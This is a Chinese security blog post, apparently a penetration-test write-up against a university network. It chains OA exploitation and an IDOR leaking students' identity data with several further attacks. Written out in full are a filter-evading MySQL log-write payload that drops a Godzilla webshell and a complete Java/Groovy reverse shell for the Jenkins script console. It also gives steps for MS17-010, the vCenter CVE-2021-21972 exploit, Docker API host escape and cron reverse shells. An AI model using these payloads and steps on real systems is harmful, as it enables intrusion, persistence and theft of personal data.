免责声明:本公众号所提供的文字和信息仅供学习和研究使用,不得用于任何非法用途。我们强烈谴责任何非法活动,并严格遵守法律法规。读者应该自觉遵守法律法规,不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任。
最近暗月弄了数个安全圈交流的群 欢迎前来加入 有需要好友添加微信发送 进群
1.拿到目标站点,是一个高校,Googlehacking找到一些学号以及教务系统。
2.随便点击一个链接,来到登录界面。
3.URL中有OAServices,这难道是个OA系统,于是fofa一手。
4.TD,嗯...梭哈是一种智慧,跑出管理员cookie。
5. 2016版的,历史漏洞挺多,找到数据库管理功能尝试通过写日志shell。
6.桌面随便新建个.sql文件进行上传,然后burp抓包开搞,先开启日志,set、select什么的都有过滤,但是能大小写绕过。
7. 设置日志路径。
8.ok,写shell,嗯...又有过滤,过滤了<?php
和一些函数,能怎么办,绕呗,<?php
这里php是可以去掉的,然后函数就用注释符来干扰。
9.写入成功,记得把日志停了。
Set global general_log=on;#开启记录日志SET global general_log_file='D:/MYOA/webroot/xxx.php';#指定日志文件路径
SELECT '<? file_put_contents/**/(/**/$_SERVER/**/[/**/"DOCUMENT_ROOT"/**/]/**/./**/"//update.php"/**/,/**/base64_decode/**/(/**/"Base64编码后的哥斯拉马"/**/)/**/)/**/;/**/?><? /**/unlink/**/(/**/__FILE__/**/)/**/;/**/?>';#有过滤,使用/**/注释符进行绕过
Set global general_log=off;#关闭日志记录
10.访问一下xxx.php,然后会将哥斯拉马写入到当前目录的update.php中,哥斯拉上线。
11.system权限,非常棒。
12.tasklist /SVC查杀软,有MSE,嗯...人太菜了,不会写免杀,只能站在巨人的肩上。
13.直接dddd。
14.用哥斯拉上传执行,然后cs成功上线。
15.TDOA的话,数据库配置文件是在D:/MYOA/webroot/inc/oa_config
,打开查看。
16.找到一些姓名 等信息,厚码。
1. 用之前收集到的学号尝试登录教务系统,抓包测试后发现验证码可复用,直接开爆,登录之后发现有个在校证明。
2.嗯哼,姓名、学院、sfz这些都有。
3.还有个二维码 扫下看看,哟,这xh字段不就是学号吗,还是明文。
4.将刚才登录的账号注销掉。
5.访问链接,修改学号,成功返回其他人信息。
1.搭建好隧道后,fscan开扫,发现一堆17010,msf直接开打。
2.扫描到的跟着往下打,梭哈的快乐。
扫到一个CVE
[+] https://x.x.x.x/ware-vcenter-unauthorized-rce-cve-2021-21972
直接用exp:https://github.com/NS-Sp4ce/CVE-2021-21972
等待写入后 冰蝎连接
是真的菜,提权没成功。
1.有个Jenkins
2.在系统管理->脚本命令行,可以命令执行。
3.直接反弹shell。
String host="x.x.x.x";
int port=1333;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
4.监听上线。
1.还有一堆的Docker Api Unauthorized,直接开搞。
2. docker拉取一个镜像。
3.使用拉取的镜像启动一个新的容器,以sh或者/bin/bash作为shell启动,并且将该宿主机的根目录挂在到容器的/mnt目录下。
4.进入/mnt目录下即可逃逸到宿主机
5.写任务计划反弹shell
6.监听,等一分钟左右,上线。
还有一堆ssh、mysql等弱口令以及Memcached unauthorized、Mongodb unauthorized这些,就不写了,整理整理交报告了。
公众号长期更新安全类文章,关注公众号,以便下次轻松查阅
觉得文章对你有帮助 请转发 点赞 收藏